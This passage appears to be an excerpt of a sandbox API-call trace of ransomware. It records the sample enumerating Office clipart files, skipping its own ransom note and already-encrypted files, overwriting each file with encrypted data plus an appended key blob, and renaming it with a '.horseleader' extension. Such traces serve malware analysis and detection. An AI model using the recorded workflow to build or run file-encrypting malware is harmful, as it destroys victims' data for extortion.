dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 67 [0253.612] StrStrW (lpFirst="BL00932_.WMF", lpSrch=".txt") returned 0x0 [0253.612] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=19476) returned 1 [0253.612] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4c14, lpOverlapped=0x0) returned 1 [0253.615] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb3ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.615] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4c14, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4c14, lpOverlapped=0x0) returned 1 [0253.615] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.615] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.615] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.615] CloseHandle (hObject=0x158) returned 1 [0253.616] GetProcessHeap () returned 0x780000 [0253.616] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.616] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.horseleader") returned 79 [0253.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.horseleader")) returned 1 [0253.617] GetProcessHeap () returned 0x780000 [0253.617] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.617] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7d46d00, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7d46d00, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0xeb8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00985_.WMF", cAlternateFileName="")) returned 1 [0253.617] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="Windows") returned -1 [0253.617] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 67 [0253.617] StrStrIW (lpFirst="BL00985_.WMF", lpSrch=".horseleader") returned 0x0 [0253.617] lstrcmpW (lpString1="BL00985_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.617] lstrcmpW (lpString1="BL00985_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.617] lstrlenW (lpString=".testttjffg") returned 11 [0253.617] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.617] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.617] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.618] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 67 [0253.618] StrStrW (lpFirst="BL00985_.WMF", lpSrch=".txt") returned 0x0 [0253.618] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3768) returned 1 [0253.618] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xeb8, lpOverlapped=0x0) returned 1 [0253.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff148, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.621] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xeb8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xeb8, lpOverlapped=0x0) returned 1 [0253.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.621] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.621] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.621] CloseHandle (hObject=0x158) returned 1 [0253.622] GetProcessHeap () returned 0x780000 [0253.622] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.622] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.horseleader") returned 79 [0253.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.horseleader")) returned 1 [0253.623] GetProcessHeap () returned 0x780000 [0253.623] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.623] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BOAT.WMF", cAlternateFileName="")) returned 1 [0253.623] lstrcmpiW (lpString1="BOAT.WMF", lpString2="Windows") returned -1 [0253.623] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 63 [0253.623] StrStrIW (lpFirst="BOAT.WMF", lpSrch=".horseleader") returned 0x0 [0253.623] lstrcmpW (lpString1="BOAT.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.623] lstrcmpW (lpString1="BOAT.WMF", lpString2="_uninstalling_.png") returned 1 [0253.623] lstrlenW (lpString=".testttjffg") returned 11 [0253.623] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF", lpSrch=".testttjffg") returned 0x0 [0253.623] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.623] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 63 [0253.624] StrStrW (lpFirst="BOAT.WMF", lpSrch=".txt") returned 0x0 [0253.624] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3350) returned 1 [0253.624] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd16, lpOverlapped=0x0) returned 1 [0253.626] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2ea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.627] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd16, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd16, lpOverlapped=0x0) returned 1 [0253.627] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.627] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.627] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.627] CloseHandle (hObject=0x158) returned 1 [0253.627] GetProcessHeap () returned 0x780000 [0253.627] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.627] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.horseleader") returned 75 [0253.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.horseleader")) returned 1 [0253.629] GetProcessHeap () returned 0x780000 [0253.629] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.629] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x714c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BOATINST.WMF", cAlternateFileName="")) returned 1 [0253.629] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="Windows") returned -1 [0253.629] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 67 [0253.629] StrStrIW (lpFirst="BOATINST.WMF", lpSrch=".horseleader") returned 0x0 [0253.629] lstrcmpW (lpString1="BOATINST.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.629] lstrcmpW (lpString1="BOATINST.WMF", lpString2="_uninstalling_.png") returned 1 [0253.629] lstrlenW (lpString=".testttjffg") returned 11 [0253.629] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF", lpSrch=".testttjffg") returned 0x0 [0253.629] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.629] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 67 [0253.630] StrStrW (lpFirst="BOATINST.WMF", lpSrch=".txt") returned 0x0 [0253.630] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=29004) returned 1 [0253.630] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.633] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.633] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.634] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x214c, lpOverlapped=0x0) returned 1 [0253.634] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.634] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x214c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x214c, lpOverlapped=0x0) returned 1 [0253.635] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.635] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.635] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.635] CloseHandle (hObject=0x158) returned 1 [0253.635] GetProcessHeap () returned 0x780000 [0253.635] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.635] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.horseleader") returned 79 [0253.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.horseleader")) returned 1 [0253.636] GetProcessHeap () returned 0x780000 [0253.637] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.637] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77641800, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77641800, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00076_.WMF", cAlternateFileName="")) returned 1 [0253.637] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="Windows") returned -1 [0253.637] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 67 [0253.637] StrStrIW (lpFirst="BS00076_.WMF", lpSrch=".horseleader") returned 0x0 [0253.637] lstrcmpW (lpString1="BS00076_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.637] lstrcmpW (lpString1="BS00076_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.637] lstrlenW (lpString=".testttjffg") returned 11 [0253.637] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.637] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.637] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 67 [0253.639] StrStrW (lpFirst="BS00076_.WMF", lpSrch=".txt") returned 0x0 [0253.639] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1330) returned 1 [0253.639] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x532, lpOverlapped=0x0) returned 1 [0253.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffface, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.641] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x532, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x532, lpOverlapped=0x0) returned 1 [0253.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.641] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.642] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.642] CloseHandle (hObject=0x158) returned 1 [0253.642] GetProcessHeap () returned 0x780000 [0253.642] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.642] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.horseleader") returned 79 [0253.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.horseleader")) returned 1 [0253.643] GetProcessHeap () returned 0x780000 [0253.643] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.643] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfadcd00, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfadcd00, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00078_.WMF", cAlternateFileName="")) returned 1 [0253.643] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="Windows") returned -1 [0253.643] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 67 [0253.643] StrStrIW (lpFirst="BS00078_.WMF", lpSrch=".horseleader") returned 0x0 [0253.643] lstrcmpW (lpString1="BS00078_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.644] lstrcmpW (lpString1="BS00078_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.644] lstrlenW (lpString=".testttjffg") returned 11 [0253.644] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.644] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.644] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.646] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 67 [0253.646] StrStrW (lpFirst="BS00078_.WMF", lpSrch=".txt") returned 0x0 [0253.646] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1444) returned 1 [0253.646] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5a4, lpOverlapped=0x0) returned 1 [0253.648] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.648] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5a4, lpOverlapped=0x0) returned 1 [0253.648] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.648] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.649] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 